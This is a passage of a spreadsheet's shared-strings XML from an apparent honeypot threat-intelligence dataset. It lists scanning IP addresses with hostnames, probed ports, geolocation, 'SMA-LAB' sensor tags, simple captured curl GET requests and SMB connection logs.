    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;123&amp;&amp;389&amp;&amp;47815&amp;&amp;52650&amp;&amp;52654&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80&amp;&amp;55149&amp;&amp;51301&amp;&amp;51288&amp;&amp;51344&amp;&amp;51360&amp;&amp;51378&amp;&amp;51398</t>
  </si>
  <si>
    <t>::ffff:7de5:7218</t>
  </si>
  <si>
    <t>a4df6b4c0a9aa47f6f4f0983f8b5266b</t>
  </si>
  <si>
    <t>220.134.244.39</t>
  </si>
  <si>
    <t>220-134-244-39.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_IPP_H39&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_HTTP_H33&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_HTTPS_H42&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;631&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;5900&amp;&amp;50818&amp;&amp;23&amp;&amp;22618&amp;&amp;40800&amp;&amp;52203&amp;&amp;52224&amp;&amp;9100&amp;&amp;35261&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:f427</t>
  </si>
  <si>
    <t>685bdef0a1e754a5f7e361382b439bda</t>
  </si>
  <si>
    <t>114.35.208.156</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-208-156.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;54557&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7223:d09c</t>
  </si>
  <si>
    <t>d3503f9c10bcdbd2cf4ccb4d0605e3e5</t>
  </si>
  <si>
    <t>173.3.128.176</t>
  </si>
  <si>
    <t>ool-ad0380b0.dyn.optonline.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Nassau</t>
  </si>
  <si>
    <t>Hicksville</t>
  </si>
  <si>
    <t>5120656</t>
  </si>
  <si>
    <t>11801</t>
  </si>
  <si>
    <t>40.76</t>
  </si>
  <si>
    <t>-73.5044</t>
  </si>
  <si>
    <t>::ffff:ad03:80b0</t>
  </si>
  <si>
    <t>2ef9e6a7d9b542b93af308af01be58f6</t>
  </si>
  <si>
    <t>165.154.195.223</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>3306&amp;&amp;1433&amp;&amp;1080</t>
  </si>
  <si>
    <t>Taoyuan</t>
  </si>
  <si>
    <t>6696918</t>
  </si>
  <si>
    <t>25.0797</t>
  </si>
  <si>
    <t>121.234</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:a59a:c3df</t>
  </si>
  <si>
    <t>bfa14881ad62f11496b33330c3068235</t>
  </si>
  <si>
    <t>94.143.198.194</t>
  </si>
  <si>
    <t>42.87</t>
  </si>
  <si>
    <t>74.59</t>
  </si>
  <si>
    <t>42837</t>
  </si>
  <si>
    <t>extraline</t>
  </si>
  <si>
    <t>ElCat LIR</t>
  </si>
  <si>
    <t>::ffff:5e8f:c6c2</t>
  </si>
  <si>
    <t>e185ba121fe8aa8adc98c07fe6ea9fad</t>
  </si>
  <si>
    <t>117.199.199.238</t>
  </si>
  <si>
    <t>::ffff:75c7:c7ee</t>
  </si>
  <si>
    <t>881bb038ed37165408bf183be2520d3d</t>
  </si>
  <si>
    <t>120.57.212.163</t>
  </si>
  <si>
    <t>::ffff:7839:d4a3</t>
  </si>
  <si>
    <t>87a386ac0c14f3228a4a6272b6064cda</t>
  </si>
  <si>
    <t>2.50.0.169</t>
  </si>
  <si>
    <t>Northwest</t>
  </si>
  <si>
    <t>Dubai (Hor Al Anz)</t>
  </si>
  <si>
    <t>33002 96696</t>
  </si>
  <si>
    <t>25.2775</t>
  </si>
  <si>
    <t>55.3418</t>
  </si>
  <si>
    <t>::ffff:232:a9</t>
  </si>
  <si>
    <t>521c2c4acfc26478b701bd4f95c2a589</t>
  </si>
  <si>
    <t>117.209.207.99</t>
  </si>
  <si>
    <t>::ffff:75d1:cf63</t>
  </si>
  <si>
    <t>490fce8eae3f550e9ec702f44e9aa8ce</t>
  </si>
  <si>
    <t>14.187.246.84</t>
  </si>
  <si>
    <t>::ffff:ebb:f654</t>
  </si>
  <si>
    <t>4d74ae6841976e8da613da7877f66fd9</t>
  </si>
  <si>
    <t>114.35.68.31</t>
  </si>
  <si>
    <t>114-35-68-31.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7223:441f</t>
  </si>
  <si>
    <t>2eadb438112671a4c46171384fee462e</t>
  </si>
  <si>
    <t>114.32.248.93</t>
  </si>
  <si>
    <t>114-32-248-93.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;59063&amp;&amp;80&amp;&amp;23&amp;&amp;38952&amp;&amp;38974&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7220:f85d</t>
  </si>
  <si>
    <t>722e23dcf745b1e69ac31132e6882ffa</t>
  </si>
  <si>
    <t>117.194.132.51</t>
  </si>
  <si>
    <t>South 24 Paraganas</t>
  </si>
  <si>
    <t>Canning</t>
  </si>
  <si>
    <t>1274984</t>
  </si>
  <si>
    <t>22.314</t>
  </si>
  <si>
    <t>88.6651</t>
  </si>
  <si>
    <t>::ffff:75c2:8433</t>
  </si>
  <si>
    <t>b7a81320aa7d7d514225d00c01341ba1</t>
  </si>
  <si>
    <t>117.241.151.168</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>1433&amp;&amp;22&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,37828)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,40840)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,52625)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,15851)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,35323)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,29690)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:75f1:97a8</t>
  </si>
  <si>
    <t>62adf51614885a7fa85c4fa05270fc48</t>
  </si>
  <si>
    <t>203.204.221.182</t>
  </si>
  <si>
    <t>Yingge District</t>
  </si>
  <si>
    <t>1665491</t>
  </si>
  <si>
    <t>24.9622</t>
  </si>
  <si>
    <t>121.331</t>
  </si>
  <si>
    <t>9416</t>
  </si>
  <si>
    <t>Hoshin Multimedia Center Inc.</t>
  </si>
  <si>
    <t>Hoshin Multimedia Center Inc</t>
  </si>
  <si>
    <t>2000-10-18</t>
  </si>
  <si>
    <t>HOSHIN-MULTIMEDIA</t>
  </si>
  <si>
    <t>::ffff:cbcc:ddb6</t>
  </si>
  <si>
    <t>fe438ba748dd3dcca37bed85fadb9d7a</t>
  </si>
  <si>
    <t>103.149.201.70</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;53122&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>KYT</t>
  </si>
  <si>
    <t>Yau Tsim Mong</t>
  </si>
  <si>
    <t>Mong Kok</t>
  </si>
  <si>
    <t>1819353</t>
  </si>
  <si>
    <t>114.168</t>
  </si>
  <si>
    <t>142032</t>
  </si>
  <si>
    <t>High Family Technology Co., Limited</t>
  </si>
  <si>
    <t>High Family Technology Co</t>
  </si>
  <si>
    <t>2020-03-22</t>
  </si>
  <si>
    <t>HFTCL-HK</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57082)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57090)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57978)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57941)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,58001)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,59146)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,60947)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,61044)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,62070)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,62508)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55242)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55310)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,56402)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,52591)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,52600)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,53419)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,51694)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,51840)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,52802)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50026)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,61571)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,61572)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,62421)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55455)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55457)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,56145)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,63503)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,63551)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,64689)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57707)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57798)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,58748)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50311)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50321)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,65022)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,65028)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,49588)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50283)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50285)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,51035)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6795:c946</t>
  </si>
  <si>
    <t>c03796cd46520568f4867e1bcf6d2d42</t>
  </si>
  <si>
    <t>220.135.66.7</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-66-7.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;22505&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;40715</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:4207</t>
  </si>
  <si>
    <t>898821a0611d36fbba78194cc3532a08</t>
  </si>
  <si>
    <t>14.252.129.204</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:efc:81cc</t>
  </si>
  <si>
    <t>6d8034bfec502f4f0353593efbf822b1</t>
  </si>
  <si>
    <t>123.110.12.185</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;37240&amp;&amp;23&amp;&amp;80&amp;&amp;55062&amp;&amp;53341&amp;&amp;NA</t>
  </si>
  <si>
    <t>24.145</t>
  </si>
  <si>
    <t>120.645</t>
  </si>
  <si>
    <t>::ffff:7b6e:cb9</t>
  </si>
  <si>
    <t>ab2f5cecab01814ed2cb4018a7fb3007</t>
  </si>
  <si>
    <t>114.33.86.202</t>
  </si>
  <si>
    <t>114-33-86-202.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;35634&amp;&amp;80&amp;&amp;23&amp;&amp;26077&amp;&amp;32908&amp;&amp;30103&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:56ca</t>
  </si>
  <si>
    <t>83e0bc0b621a1a38696e0536ee4747bf</t>
  </si>
  <si>
    <t>120.60.15.184</t>
  </si>
  <si>
    <t>::ffff:783c:fb8</t>
  </si>
  <si>
    <t>741883352af8648ba59b3bee0d491916</t>
  </si>
  <si>
    <t>59.126.156.132</t>
  </si>
  <si>
    <t>59-126-156-132.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
